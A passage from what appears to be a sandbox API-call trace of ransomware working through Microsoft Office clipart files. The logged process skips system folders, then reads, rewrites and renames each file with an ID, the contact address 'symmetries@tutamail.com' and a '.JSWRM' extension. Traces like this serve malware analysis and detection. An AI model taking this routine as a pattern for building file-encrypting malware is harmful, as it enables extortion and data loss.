lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0234001.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0088.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234001.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234001.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0234001.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0088.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0088.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234001.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.358] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19264) returned 1 [0088.358] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b40) returned 0x24d210 [0088.359] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4b40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4b40, lpOverlapped=0x0) returned 1 [0088.363] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.363] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4b40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4b40, lpOverlapped=0x0) returned 1 [0088.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.363] CloseHandle (hObject=0x314) returned 1 [0088.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0088.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0088.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0088.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0088.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.364] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234001.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234001.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0088.365] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x80d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0234376.WMF", cAlternateFileName="")) returned 1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2=".") returned 1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="..") returned 1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="...") returned 1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="windows") returned -1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="recovery") returned -1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="perflogs") returned -1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="documents and settings") returned 1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="system volume information") returned -1 [0088.365] lstrcmpiW (lpString1="J0234376.WMF", lpString2="msocache") returned -1 [0088.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234376.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234376.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0234376.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234376.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234376.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0234376.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234376.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.366] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32980) returned 1 [0088.366] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80d0) returned 0x24d210 [0088.366] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x80d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x80d0, lpOverlapped=0x0) returned 1 [0088.373] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.373] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x80d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x80d0, lpOverlapped=0x0) returned 1 [0088.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.374] CloseHandle (hObject=0x314) returned 1 [0088.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0088.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0088.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0088.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0088.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234376.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234376.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.375] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcba0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0237225.WMF", cAlternateFileName="")) returned 1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2=".") returned 1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="..") returned 1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="...") returned 1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="windows") returned -1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="recovery") returned -1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="perflogs") returned -1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="documents and settings") returned 1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="system volume information") returned -1 [0088.375] lstrcmpiW (lpString1="J0237225.WMF", lpString2="msocache") returned -1 [0088.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0088.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237225.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237225.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237225.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0088.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0088.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237225.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237225.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237225.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0088.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237225.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.376] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=52128) returned 1 [0088.376] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcba0) returned 0x24d210 [0088.377] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xcba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xcba0, lpOverlapped=0x0) returned 1 [0088.383] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.383] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xcba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xcba0, lpOverlapped=0x0) returned 1 [0088.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.388] CloseHandle (hObject=0x314) returned 1 [0088.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0088.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0088.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0088.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0088.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0088.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237225.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237225.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0088.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.389] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5700, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0237228.WMF", cAlternateFileName="")) returned 1 [0088.389] lstrcmpiW (lpString1="J0237228.WMF", lpString2=".") returned 1 [0088.389] lstrcmpiW (lpString1="J0237228.WMF", lpString2="..") returned 1 [0088.389] lstrcmpiW (lpString1="J0237228.WMF", lpString2="...") returned 1 [0088.389] lstrcmpiW (lpString1="J0237228.WMF", lpString2="windows") returned -1 [0088.389] lstrcmpiW (lpString1="J0237228.WMF", lpString2="recovery") returned -1 [0088.390] lstrcmpiW (lpString1="J0237228.WMF", lpString2="perflogs") returned -1 [0088.390] lstrcmpiW (lpString1="J0237228.WMF", lpString2="documents and settings") returned 1 [0088.390] lstrcmpiW (lpString1="J0237228.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.390] lstrcmpiW (lpString1="J0237228.WMF", lpString2="system volume information") returned -1 [0088.390] lstrcmpiW (lpString1="J0237228.WMF", lpString2="msocache") returned -1 [0088.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237228.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237228.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237228.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237228.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237228.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237228.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237228.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.390] 